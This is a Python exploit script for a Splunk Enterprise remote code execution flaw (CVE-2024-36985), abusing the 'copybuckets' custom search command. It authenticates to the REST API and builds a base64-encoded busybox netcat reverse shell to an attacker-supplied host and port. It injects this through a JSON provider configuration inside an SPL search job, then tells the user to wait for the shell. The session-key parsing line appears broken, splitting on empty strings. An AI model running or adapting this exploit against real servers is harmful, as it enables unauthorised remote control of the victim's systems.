#!/usr/bin/env python3 # -*- coding: utf-8 -*- # ============================================================================== # Exploit for Splunk Enterprise RCE (copybuckets.py) - CVE-2024-36985 # # This script automates the exploitation by using the 'copybuckets' custom # search command, which is the most direct and accurate attack vector. # ============================================================================== import requests import base64 import json import argparse import sys import urllib3 # Suppress InsecureRequestWarning for self-signed certificates urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def print_banner(): """Prints a cool banner.""" print("="*60) print(" CVE-2024-36985 - Splunk 'copybuckets' Custom Command RCE Exploit") print("="*60) def get_session_key(host, mgmt_port, username, password, use_ssl=True): """Authenticates to Splunk and retrieves a session key.""" protocol = "https" if use_ssl else "http" login_url = f"{protocol}://{host}:{mgmt_port}/services/auth/login" print(f"[*] Authenticating to {login_url} as '{username}'...") try: r = requests.post(login_url, data={'username': username, 'password': password}, verify=False, timeout=15) if r.status_code != 200: print(f"[!] Error: Authentication failed. Status code: {r.status_code}") print(f"[!] HINT: The API endpoint was not found. Are you using the correct management port (default 8089)?") return None session_key = r.text.split('')[1].split('')[0] print("[+] Successfully obtained session key!") return session_key except requests.exceptions.RequestException as e: print(f"[!] Error: Connection to Splunk failed: {e}") return None def construct_final_payload(lhost, lport): """Constructs the final, proven-to-work JSON payload string.""" # Please change your payload here. reverse_shell_cmd = f"busybox nc {lhost} {lport} -e /bin/bash" print(f"[*] Reverse shell command: {reverse_shell_cmd}") b64_payload = base64.b64encode(reverse_shell_cmd.encode()).decode() print(f"[*] Base64 encoded payload: {b64_payload}") decode_and_exec_cmd = f"{{echo,{b64_payload}}}|{{base64,-d}}|{{bash,-i}}" print(f"[*] On-target decode command: {decode_and_exec_cmd}") json_dict = { "providers": { "pwn_provider": { "command.arg.0": "/opt/splunk/etc/apps/splunk_archiver/java-bin/jars/sudobash", "command.arg.1": "-c", "command.arg.2": decode_and_exec_cmd } }, "vixes": { "pwn_vix": { "provider": "pwn_provider" } } } # Return the raw JSON string. The trigger function will handle formatting. json_string = json.dumps(json_dict) print("[+] Final JSON payload constructed successfully.") return json_string def trigger_exploit(host, mgmt_port, use_ssl, session_key, json_payload): """Executes the exploit by running the custom search command via the REST API.""" # --- SPL Query Construction --- # We need to escape the double quotes inside the JSON payload string # to embed it within the 'data="..."' part of the SPL query. spl_escaped_json = json_payload.replace('"', '\\"') # This is the final, simple SPL query based on your discovery. spl_query = f'| copybuckets data="{spl_escaped_json}"' print(f"[*] Constructed malicious SPL query: {spl_query}") # --- API Call Setup --- protocol = "https" if use_ssl else "http" search_url = f"{protocol}://{host}:{mgmt_port}/services/search/jobs" headers = { 'Authorization': f'Splunk {session_key}' } data = { 'search': spl_query, 'exec_mode': 'oneshot', # We must specify the app context where the custom command is defined. 'app': 'splunk_archiver' } print("[-] Triggering exploit by creating a remote search job...") print(f"[*] Make sure your listener is running on your local machine (e.g., nc -lvnp )") try: r = requests.post(search_url, headers=headers, data=data, verify=False, timeout=20) if r.status_code == 201 or r.status_code == 200: # 201 Created for normal jobs, 200 for oneshot print("[+] Exploit command sent successfully via search API. Check your listener for a shell!") else: print(f"[!] Error: Failed to create the search job. Status code: {r.status_code}") print(f"[!] Response: {r.text}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred while sending the search job: {e}") if __name__ == "__main__": print_banner() parser = argparse.ArgumentParser(description="Exploit for Splunk Enterprise RCE (CVE-2024-36985)") parser.add_argument("-t", "--target", required=True, help="Splunk host (e.g., 192.168.1.100)") parser.add_argument("-u", "--user", required=True, help="Splunk username") parser.add_argument("-P", "--password", required=True, help="Splunk password") parser.add_argument("--lhost", required=True, help="Your local IP address for the reverse shell") parser.add_argument("--lport", required=True, type=int, help="Your local port for the reverse shell") parser.add_argument("--mgmt-port", default=8089, type=int, help="Splunk management port for API calls (default: 8089)") parser.add_argument("--no-ssl", action="store_true", help="Use HTTP instead of HTTPS for the management connection") args = parser.parse_args() use_ssl = not args.no_ssl session_key = get_session_key(args.target, args.mgmt_port, args.user, args.password, use_ssl) if not session_key: sys.exit(1) payload = construct_final_payload(args.lhost, args.lport) trigger_exploit(args.target, args.mgmt_port, use_ssl, session_key, payload)